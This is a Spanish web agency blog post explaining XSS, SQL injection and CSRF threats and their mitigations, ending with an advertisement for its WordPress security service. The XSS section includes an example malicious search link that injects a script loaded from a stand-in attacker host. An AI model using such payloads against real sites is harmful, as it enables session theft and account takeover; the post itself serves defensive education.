Ir al contenido
Diseño web en Gijón
  • Quiénes somos
  • Soluciones
  • Portafolios
  • Kit Digital
  • Quiénes somos
  • Soluciones
  • Portafolios
  • Kit Digital
Contacto
Inicio  /  Blog  /  Conoce cuáles son las amenazas contra la seguridad de sitios web

Conoce cuáles son las amenazas contra la seguridad de sitios web

  • Elaborado por la redacción XF
  • 8 min de lectura
Índice de contenidos

Tener un sitio web no es cosa de juegos, por lo que es necesario seguir ciertas normas para que todo funcione bien. Es importante respaldar bien los datos, información en general, contraseñas entre otros. Así como protegernos de cualquier ataque cibernético que pueda llegar a nuestra web, es una responsabilidad que hay que cumplir. La seguridad de sitios web debe estar por encima de todo para mantener la confidencialidad a salvo.

La seguridad web demanda vigilancia en todos los aspectos del diseño y uso de un sitio web. Este artículo, te ayudará a entender de donde provienen las amenazas y que puedes hacer para robustecer tu aplicación web contra los ataques más frecuentes.

¿Qué es la seguridad de sitios web?

Es la que se encarga de prevenir ataques al sitio web. Formalmente, se trata de acción/practica de proteger sitios web del acceso, modificación, destrucción o interrupción, forzados no autorizados.

Cabe destacar que Internet es peligroso. Por lo que la seguridad de sitios web debe ser eficaz, requiere esfuerzos de diseño a lo largo de la totalidad del sitio web: en tu aplicación web, en tus políticas para crear y renovar contraseñas, en la configuración del servidor web, y en el código del lado del cliente.

La realidad es que todo esto suena inquietante, sin embargo, hay una buena noticia, si estas usando un framework web de lado del servidor, es casi seguro que por defecto habilitará mecanismos de defensa robustos y bien pensados contra gran cantidad de los ataques más comunes. Asimismo, otros ataques pueden debilitarse mediante la configuración de tu servidor web, un ejemplo de ello es habilitar HTTPS.

De igual modo, existen herramientas de escaneado de vulnerabilidades disponibles públicamente que pueden darte una mano en la investigación si has cometido algún error obvio.

Todo sitio web puede ser amenazado en cualquier momento, el detalle es estar preparado para superar los ataques y tener las herramientas correctas para desarraigar la amenaza. En este sentido, a continuación te indicaremos cuáles son esas amenazas que constantemente pueden asechar tu sitio web.

Conoce cuáles son las amenazas contra la seguridad de sitios web

Amenazas contra la seguridad de sitios web

En este segmento te listaremos algunas de las amenazas más comunes para los sitios web y cómo son mitigadas. A medida que vayas leyendo podrás darte cuenta cómo las amenazas tienen éxito cuando la aplicación web no es lo suficientemente robusta acerca de los datos que vienen del explorador web.

Cross-Site Scripting (XSS)

Este término se utiliza para describir un tipo de ataques donde el atacante inyecta scripts de lado cliente, a través del sitio web, hasta los exploradores de otros usuarios. El código inyectado va del lado del servidor al explorador, lo que supone confianza, permitiéndole hacer cosas como enviar al atacante la cookie de autorización al sitio del usuario.

Cuando el atacante tiene la cookie puede iniciar sesión en el sitio como si él fuera el verdadero usuario y puede hacer cualquier cosa. Depende de que sitio se trate, esto podría incluir acceso a los detalles de su tarjeta de crédito, visualizar detalles de contacto e incluso cambiar contraseñas entre otros.

Las vulnerabilidades XSS han sido a través de la historia las más comunes que las de cualquier otro tipo.

Existen dos aproximaciones principales para conseguir que el sitio devuelva scripts inyectados al explorador, estas son las vulnerabilidades XSS reflejadas y persistentes.

  • La vulnerabilidad XSS reflejada se presenta cuando el contenido del usuario que se pasa al servidor se devuelve inmediatamente y sin modificar para que los muestre el explorador. ¡OJO, cualquier script en el contenido original del usuario se ejecutará inmediatamente cuando se cargue una nueva página!

Ejemplo de ello es lo siguiente: considera una función de búsqueda en un sitio donde los términos de búsqueda están codificados como parámetros URL y estos términos se presentan junto con los resultados. Un atacante fácilmente puede construir un enlace de búsqueda que contenga un script malicioso como parámetro. (ej. http://myweb.com?q=beer<script%20src=»http://evilweb.com/tricky.js»></script>) y enviarlo en un correo electrónico a otro usuario: si el usuario pincha en este enlace que parece interesante, el script se ejecutará cuando se muestren los datos en pantalla los resultados de la búsqueda. Esto proporciona al atacante toda la información que necesita para entrar al sitio como si fuera el usuario destinatario, realizando compras o compartiendo información de contactos como si fuera el usuario.

  • La vulnerabilidad XSS persistente se trata de un script malicioso que se almacena en el sitio web y luego más tarde se vuelve a presentar en pantalla sin modificar para que otros usuarios lo ejecuten involuntariamente. Por ejemplo, un foro de discusión que acepta comentarios que contengan HTML sin modificar, podría almacenar un script malicioso de un atacante. Una vez que se muestren los comentarios se ejecutará el script y enviará al atacante la información requerida para acceder a la cuenta del usuario. Esta clase de ataque es popular en extremo y muy potente, debido a que el atacante no tiene ninguna relación directa con las víctimas.

Conoce cuáles son las amenazas contra la seguridad de sitios web

Inyección SQL


Estas vulnerabilidades permiten que usuarios maliciosos ejecuten códigos SQL de forma arbitraria en una base de datos, teniendo acceso a los datos, con la posibilidad de modificar o borrar, independientemente de los permisos del usuario.

Un ataque de inyección exitoso, puede falsificar identidades, crear nuevas identidades con derechos de administración, acceder a todos los datos en el servidor o destruir/modificar los datos para hacerlos inutilizables.

Una forma de evitar esta clase de ataques es asegurar que cualquier dato de usuario que se pasa a un query SQL no puede cambiar la naturaleza del mismo. Una manera de hacer esto es eludir (escape) todos los caracteres de la entrada de usuario que tengan un significado especial en SQL.

Vale la pena resaltar que, los frameworks web con frecuencia tienen cuidado de hacer por ti la elusión de caracteres.

Cross Site Request Forgery (CSRF)

Estos ataques permiten que un usuario malicioso ejecute acciones usando las credenciales de otro usuario sin el consentimiento de éste.

Este tipo de ataque se explica mejor con un ejemplo. Juan es un usuario malicioso que sabe que un sitio en particular permite a los usuarios que han iniciado sesión enviar dinero a una cuenta especifica usando una petición HTTP POST que incluye el nombre de la cuenta y una cantidad de dinero.

Juan crea un formulario que incluye los detalles de su banco y una cantidad de dinero como campos ocultos, y lo envía por correo electrónico a otros usuarios del sitio (con el botón de Enviar camuflado como enlace a un sitio “hazte millonario rápidamente”).

El resultado es que cualquier usuario que pinche en el botón Enviar mientras tiene la sesión iniciada en el sitio comercial hará la transacción. ¡Juan se hará rico!

El truco aquí es que Juan no necesita tener acceso a los cookies del usuario (o acceso a sus credenciales). El explorador del usuario almacena esta información, y la incluye automáticamente en todas las peticiones al servidor asociado.

Una forma de prevenir este tipo de ataque por parte del servidor es requerir que la petición POST incluya una palabra secreta especifica del usuario generada por el sitio (la palabra secreta podría proporcionarla el servidor cuando envía el formulario web que se utiliza para hacer transferencias).

Gracias a esta aproximación no permite que Juan pueda crear su propio formulario, porque necesitaría conocer la palabra secreta que el servidor ha proporcionado para el usuario. Incluso si conociera esta palabra y creara un formulario para un usuario en particular, no podría usar el mismo formulario para atacar a todos los usuarios.

Estos son las amenazas más comunes que pueden atacar tu sitio web, lo ideal es que mantengas tu web segura para que no esté en riesgo cuando aparezcan estas vulnerabilidades.

En XenonFactory queremos ayudarte y aportar soluciones viables que te permitan robustecer tu sitio web, por lo que te ofrecemos nuestro servicio de Seguridad Anti-hackeo WordPress, con el que tendrás un escudo para evitar los ataques maliciosos que se puedan presentar en tu web.

Otros artículos recomendables para revisar

Outsourcing: Entérate de cuándo es el momento indicado para contratarlo
  • Redacción XF

Cuando hablamos de un servicio de outsourcing, nos estamos refiriendo a una subcontratación, donde la empresa en cuestión busca externalizar un departamento o función de…

El reconocimiento facial en las apps móviles
  • Redacción XF

Conoce todo acerca del reconocimiento facial en las apps móviles y descubre los beneficios de esta nueva tendencia. Para nadie es un secreto que el…

Cómo crear una Tienda virtual WooCommerce
  • Redacción XF

Siguiendo nuestras instrucciones podrás comenzar a crear tu propia Tienda virtual WooCommerce. Crear una Tienda virtual WooCommerce será fácil y sencillo si prestas atención y…

¿Se puede animar y alentar a que se comparta nuestro contenido en Google+?
  • Redacción XF

Ya os hemos hablado de que la red social de Google, Google+ tiene un factor clave para que volquemos en ella una parte del contenido…

Las nuevas conversiones en las campañas de Google Adwords
  • Redacción XF

Conversiones multidispositivo, es el nombre de las nuevas integrantes en la columna de conversiones de las campañas de Google Adwords y aquí te traemos todos…

Principales factores que influyen en el Posicionamiento SEO
  • Redacción XF

Si estás buscando ganar más clientes para tu negocio, no te puedes perder esta lista de los principales factores que influyen en el Posicionamiento SEO…

Conoce todos los artículos
Diseño web en Asturias
  • se.yrotcafnonex@ofni
  • 984 263 007
  • Gijón (Asturias)

Síguenos

Linkedin-in X-twitter

Soluciones

  • Diseño de páginas web en Asturias
  • Diseño de tiendas online en Asturias
  • Posicionamiento web en Asturias
  • Inteligencia Artificial en Asturias

Accesos

  • Blog

SOPORTE

  • Windows
  • Mac
  • Android
  • Aviso legal
  • Política de privacidad
  • Política de cookies
  • Accesibilidad
  • Aviso legal
  • Política de privacidad
  • Política de cookies
  • Accesibilidad
Administrar consentimiento de cookies
Nuestro website utiliza cookies que permitirán mejorar tu experiencia como usuario mediante el análisis de tus hábitos de navegación y en cumplimiento de la Ley 34/2002, de 11 de julio, de servicios de la sociedad de la información y de comercio electrónico (LSSICE).  La información sobre las cookies que usamos es lo que va a garantizar que el usuario pueda tomar su decisión de forma consciente y libre a la hora de prestar su consentimiento o, por el contrario, que no acepte la instalación de cookies en su dispositivo en los términos del artículo 22 de la Ley 34/2002, de 11 de julio, de Servicios de la Sociedad de la Información y Comercio Electrónico (LSSICE).
Funcional Siempre activo
El almacenamiento o acceso técnico es estrictamente necesario para el propósito legítimo de permitir el uso de un servicio específico explícitamente solicitado por el abonado o usuario, o con el único propósito de llevar a cabo la transmisión de una comunicación a través de una red de comunicaciones electrónicas.
Preferencias
El almacenamiento o acceso técnico es necesario para la finalidad legítima de almacenar preferencias no solicitadas por el abonado o usuario.
Estadísticas
El almacenamiento o acceso técnico que es utilizado exclusivamente con fines estadísticos. El almacenamiento o acceso técnico que se utiliza exclusivamente con fines estadísticos anónimos. Sin un requerimiento, el cumplimiento voluntario por parte de tu proveedor de servicios de Internet, o los registros adicionales de un tercero, la información almacenada o recuperada sólo para este propósito no se puede utilizar para identificarte.
Marketing
El almacenamiento o acceso técnico es necesario para crear perfiles de usuario para enviar publicidad, o para rastrear al usuario en una web o en varias web con fines de marketing similares.
Administrar opciones Gestionar los servicios Gestionar {vendor_count} proveedores Leer más sobre estos propósitos
Ver preferencias
{title} {title} {title}
Diseño web en Gijón
Diseño web en Gijón
  • se.yrotcafnonex@ofni
  • 984 263 007
  • Gijón (Asturias)

Síguenos

Linkedin-in X-twitter
  • Quiénes somos
  • Soluciones
  • Desarrollo web con WordPress
  • Creación de tiendas virtuales con WooCommerce
  • Marketing SEO (On-page y Off-page)
  • Ciberseguridad aplicada a WordPress
  • Inteligencia Artificial aplicada
  • Desarrollo ad hoc para proyectos personalizados
  • Outsourcing tecnológico (agencias y consultoras)
  • Acompañamiento y formación contínua
  • Portafolios
  • Kit Digital
  • Contacto
Accesibilidad
Modos de accesibilidad
Modo seguro de epilepsia
Humedece el color y elimina los parpadeos.
Este modo permite a las personas con epilepsia utilizar el sitio web de forma segura al eliminar el riesgo de convulsiones que resultan de las animaciones intermitentes o parpadeantes y las combinaciones de colores arriesgadas.
Modo para personas con discapacidad visual
Mejora las imágenes del sitio web.
Este modo ajusta el sitio web para la comodidad de los usuarios con discapacidades visuales, como visión degradada, visión de túnel, cataratas, glaucoma y otras.
Modo de discapacidad cognitiva
Ayuda a concentrarse en contenido específico.
Este modo brinda diferentes opciones de asistencia para ayudar a los usuarios con deficiencias cognitivas, como dislexia, autismo, CVA y otras, a concentrarse más fácilmente en los elementos esenciales del sitio web.
Modo compatible con TDAH
Reduce las distracciones y mejora el enfoque.
Este modo ayuda a los usuarios con TDAH y trastornos del desarrollo neurológico a leer, navegar y concentrarse en los elementos principales del sitio web con mayor facilidad, al tiempo que reduce significativamente las distracciones.
Modo de ceguera
Permite usar el sitio con su lector de pantalla
Este modo configura el sitio web para que sea compatible con lectores de pantalla como JAWS, NVDA, VoiceOver y TalkBack. Un lector de pantalla es un software para usuarios ciegos que se instala en una computadora y un teléfono inteligente, y los sitios web deben ser compatibles con él.
Diccionario en línea
    Experiencia legible
    Escalado de contenido
    Por defecto
    Lupa de texto
    Fuente legible
    Apto para dislexia
    Destacar títulos
    Destacar enlaces
    Tamaño de fuente
    Por defecto
    Altura de la línea
    Por defecto
    Espaciado de letras
    Por defecto
    Alineado a la izquierda
    Centro alineado
    Alineado a la derecha
    Experiencia visualmente agradable
    Contraste oscuro
    Contraste de luz
    Monocromo
    Alto contraste
    Alta saturación
    Baja saturación
    Ajustar colores de texto
    Ajustar los colores del título
    Ajustar los colores de fondo
    Orientación Fácil
    Silenciar sonidos
    Ocultar imágenes
    Ocultar emoji
    Guía de lectura
    Detener animaciones
    Máscara de lectura
    Resaltar pasar el cursor
    Resalte el enfoque
    Gran cursor oscuro
    Cursor de luz grande
    Lectura cognitiva
    Teclado virtual
    Teclas de navegación
    Navegación por voz

    Diseño web en Asturias desde 2007

    Accessibility Statement

    • xenonfactory.es
    • 13 octubre, 2025

    Compliance status

    We firmly believe that the internet should be available and accessible to anyone, and are committed to providing a website that is accessible to the widest possible audience, regardless of circumstance and ability.

    To fulfill this, we aim to adhere as strictly as possible to the World Wide Web Consortium’s (W3C) Web Content Accessibility Guidelines 2.1 (WCAG 2.1) at the AA level. These guidelines explain how to make web content accessible to people with a wide array of disabilities. Complying with those guidelines helps us ensure that the website is accessible to all people: blind people, people with motor impairments, visual impairment, cognitive disabilities, and more.

    This website utilizes various technologies that are meant to make it as accessible as possible at all times. We utilize an accessibility interface that allows persons with specific disabilities to adjust the website’s UI (user interface) and design it to their personal needs.

    Additionally, the website utilizes an AI-based application that runs in the background and optimizes its accessibility level constantly. This application remediates the website’s HTML, adapts Its functionality and behavior for screen-readers used by the blind users, and for keyboard functions used by individuals with motor impairments.

    If you’ve found a malfunction or have ideas for improvement, we’ll be happy to hear from you. You can reach out to the website’s operators by using the following email

    Screen-reader and keyboard navigation

    Our website implements the ARIA attributes (Accessible Rich Internet Applications) technique, alongside various different behavioral changes, to ensure blind users visiting with screen-readers are able to read, comprehend, and enjoy the website’s functions. As soon as a user with a screen-reader enters your site, they immediately receive a prompt to enter the Screen-Reader Profile so they can browse and operate your site effectively. Here’s how our website covers some of the most important screen-reader requirements, alongside console screenshots of code examples:

    1. Screen-reader optimization: we run a background process that learns the website’s components from top to bottom, to ensure ongoing compliance even when updating the website. In this process, we provide screen-readers with meaningful data using the ARIA set of attributes. For example, we provide accurate form labels; descriptions for actionable icons (social media icons, search icons, cart icons, etc.); validation guidance for form inputs; element roles such as buttons, menus, modal dialogues (popups), and others. Additionally, the background process scans all the website’s images and provides an accurate and meaningful image-object-recognition-based description as an ALT (alternate text) tag for images that are not described. It will also extract texts that are embedded within the image, using an OCR (optical character recognition) technology. To turn on screen-reader adjustments at any time, users need only to press the Alt+1 keyboard combination. Screen-reader users also get automatic announcements to turn the Screen-reader mode on as soon as they enter the website.

      These adjustments are compatible with all popular screen readers, including JAWS and NVDA.

    2. Keyboard navigation optimization: The background process also adjusts the website’s HTML, and adds various behaviors using JavaScript code to make the website operable by the keyboard. This includes the ability to navigate the website using the Tab and Shift+Tab keys, operate dropdowns with the arrow keys, close them with Esc, trigger buttons and links using the Enter key, navigate between radio and checkbox elements using the arrow keys, and fill them in with the Spacebar or Enter key.Additionally, keyboard users will find quick-navigation and content-skip menus, available at any time by clicking Alt+1, or as the first elements of the site while navigating with the keyboard. The background process also handles triggered popups by moving the keyboard focus towards them as soon as they appear, and not allow the focus drift outside it.

      Users can also use shortcuts such as “M” (menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics) to jump to specific elements.

    Disability profiles supported in our website

    • Epilepsy Safe Mode: this profile enables people with epilepsy to use the website safely by eliminating the risk of seizures that result from flashing or blinking animations and risky color combinations.
    • Visually Impaired Mode: this mode adjusts the website for the convenience of users with visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others.
    • Cognitive Disability Mode: this mode provides different assistive options to help users with cognitive impairments such as Dyslexia, Autism, CVA, and others, to focus on the essential elements of the website more easily.
    • ADHD Friendly Mode: this mode helps users with ADHD and Neurodevelopmental disorders to read, browse, and focus on the main website elements more easily while significantly reducing distractions.
    • Blindness Mode: this mode configures the website to be compatible with screen-readers such as JAWS, NVDA, VoiceOver, and TalkBack. A screen-reader is software for blind users that is installed on a computer and smartphone, and websites must be compatible with it.
    • Keyboard Navigation Profile (Motor-Impaired): this profile enables motor-impaired persons to operate the website using the keyboard Tab, Shift+Tab, and the Enter keys. Users can also use shortcuts such as “M” (menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics) to jump to specific elements.

    Additional UI, design, and readability adjustments

    1. Font adjustments – users, can increase and decrease its size, change its family (type), adjust the spacing, alignment, line height, and more.
    2. Color adjustments – users can select various color contrast profiles such as light, dark, inverted, and monochrome. Additionally, users can swap color schemes of titles, texts, and backgrounds, with over seven different coloring options.
    3. Animations – person with epilepsy can stop all running animations with the click of a button. Animations controlled by the interface include videos, GIFs, and CSS flashing transitions.
    4. Content highlighting – users can choose to emphasize important elements such as links and titles. They can also choose to highlight focused or hovered elements only.
    5. Audio muting – users with hearing devices may experience headaches or other issues due to automatic audio playing. This option lets users mute the entire website instantly.
    6. Cognitive disorders – we utilize a search engine that is linked to Wikipedia and Wiktionary, allowing people with cognitive disorders to decipher meanings of phrases, initials, slang, and others.
    7. Additional functions – we provide users the option to change cursor color and size, use a printing mode, enable a virtual keyboard, and many other functions.

    Browser and assistive technology compatibility

    We aim to support the widest array of browsers and assistive technologies as possible, so our users can choose the best fitting tools for them, with as few limitations as possible. Therefore, we have worked very hard to be able to support all major systems that comprise over 95% of the user market share including Google Chrome, Mozilla Firefox, Apple Safari, Opera and Microsoft Edge, JAWS and NVDA (screen readers).

    Notes, comments, and feedback

    Despite our very best efforts to allow anybody to adjust the website to their needs. There may still be pages or sections that are not fully accessible, are in the process of becoming accessible, or are lacking an adequate technological solution to make them accessible. Still, we are continually improving our accessibility, adding, updating and improving its options and features, and developing and adopting new technologies. All this is meant to reach the optimal level of accessibility, following technological advancements. For any assistance, please reach out to